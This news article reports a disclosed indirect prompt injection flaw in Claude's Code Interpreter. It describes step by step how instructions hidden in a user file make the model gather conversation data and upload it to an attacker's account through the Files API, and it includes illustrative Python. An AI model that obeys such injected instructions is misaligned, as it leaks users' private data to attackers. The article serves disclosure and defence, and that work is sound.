[AI and Security] Claude AI, 'Indirect Prompt Injection' Vulnerability Discovered... Risk of Sensitive Information Theft
News


2025.11.16
· Web · by Anonymous
#AI #Security #Vulnerability #PromptInjection #Anthropic

Key Points

  1. A critical vulnerability has been discovered in Anthropic's Claude AI, allowing sensitive user data to be exfiltrated through indirect prompt injection attacks.
  2. This exploit leverages the Code Interpreter's network access and Claude's 'memory' function to force the AI to extract and upload user data to an attacker's account, bypassing authentication.
  3. Security experts advise strengthening sandbox rules to limit API calls, restricting network access, and treating this as a "triple threat" combining powerful AI models, external access, and prompt-based control.

A vulnerability termed "Indirect Prompt Injection" has been discovered in Anthropic's Claude AI, enabling the exfiltration of sensitive user data to an attacker's account. The root cause lies in the newly added network access feature of Claude's Code Interpreter tool. Specifically, the default setting, "Package manager only," permits network access to approved domains, including api.anthropic.com, which security researcher Johann Rehberger identified as a security loophole.
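To illustrate why this default is a loophole, consider a hypothetical egress allowlist of the kind described above. The domain list and the `egress_allowed` helper are assumptions made for this sketch, not Anthropic's actual configuration:

```python
# Illustrative sketch: an egress allowlist resembling the
# "Package manager only" setting. Domains are hypothetical examples.
APPROVED_DOMAINS = {
    "pypi.org",                # legitimate: Python package index
    "registry.npmjs.org",      # legitimate: npm package registry
    "api.anthropic.com",       # the loophole: the Anthropic API itself
}

def egress_allowed(host: str) -> bool:
    """Return True if sandboxed code may open a connection to `host`."""
    return host in APPROVED_DOMAINS

egress_allowed("evil.example.com")   # blocked, as intended
egress_allowed("api.anthropic.com")  # permitted, so sandbox code can
                                     # call the API with any key it likes
```

Because the API host is on the allowlist, code running inside the sandbox can authenticate to it with credentials of its own choosing, which is exactly what the attack below exploits.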

The core methodology of this attack involves a multi-stage process leveraging Claude's internal functionalities:

  1. Indirect Prompt Injection: An attacker initiates the attack by embedding malicious instructions within seemingly innocuous content, such as a file provided by a user for analysis. This hidden instruction serves as an indirect prompt.
  2. Memory Exploitation: Upon processing the malicious content, the injected indirect prompt exploits Claude's 'memory' feature. This instructs the AI to extract recent conversational data or other sensitive information from its context and store it as a file within Claude's isolated sandbox environment.
  3. Forced Code Execution: The malicious prompt then compels Claude to execute a specific Python script within its Code Interpreter.
  4. API Key Configuration: The executed Python script is designed to set the attacker's own API key as an environment variable within Claude's execution context.
  5. Data Exfiltration via Files API: Finally, the Python script calls the Anthropic Files API to upload the previously stolen files from the sandbox environment directly to the attacker's API-associated account. This entire sequence bypasses the legitimate user's authentication procedures.
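Steps 4 and 5 can be sketched as follows. This is an illustrative reconstruction, not the researcher's actual payload: the file path, the placeholder key, and the `build_upload_request` helper are invented for the sketch, and the request is only constructed here, never sent. The endpoint and header names follow Anthropic's published Files API documentation:

```python
import os

# Step 4: the injected script plants the *attacker's* key in the
# environment, overriding whatever credentials the sandbox would use.
os.environ["ANTHROPIC_API_KEY"] = "sk-ant-ATTACKER-KEY"  # placeholder

def build_upload_request(path: str) -> dict:
    """Assemble (but do not send) a Files API upload request."""
    return {
        "method": "POST",
        "url": "https://api.anthropic.com/v1/files",
        "headers": {
            "x-api-key": os.environ["ANTHROPIC_API_KEY"],
            "anthropic-version": "2023-06-01",
            "anthropic-beta": "files-api-2025-04-14",
        },
        "file": path,
    }

# Step 5: the stolen conversation dump is uploaded with the attacker's
# key, so it lands in the attacker's account. No step in this chain ever
# checks the identity of the logged-in user.
req = build_upload_request("/tmp/stolen_conversation.md")
```

The key observation is that the Files API trusts whatever `x-api-key` accompanies the request, so authentication effectively belongs to the attacker from step 4 onward.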

Johann Rehberger responsibly disclosed this vulnerability to Anthropic, which initially dismissed it as an out-of-scope "model safety issue" but later acknowledged its validity. Security experts categorize this as a critical "triple threat" due to the confluence of powerful AI models, external network access capabilities, and prompt-based control mechanisms. Recommended mitigation strategies include strengthening sandbox rules to restrict API calls exclusively to the logged-in user's account and advising users to minimize or disable the AI's network access.
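A minimal sketch of the first mitigation, binding sandbox API calls to the logged-in user's own credentials, might look like this. The `api_call_allowed` helper and the key values are hypothetical, not Anthropic's implementation:

```python
import hmac

def api_call_allowed(request_key: str, session_key: str) -> bool:
    """Permit sandbox traffic to api.anthropic.com only when the request
    authenticates with the logged-in user's own API key."""
    # Constant-time comparison avoids leaking key material via timing.
    return hmac.compare_digest(request_key, session_key)

api_call_allowed("sk-ant-user-key", "sk-ant-user-key")      # allowed
api_call_allowed("sk-ant-attacker-key", "sk-ant-user-key")  # blocked
```

Enforced at the sandbox's egress boundary, such a check would close the cross-account upload path even when the prompt injection itself succeeds, since stolen files could only ever be uploaded back into the victim's own account.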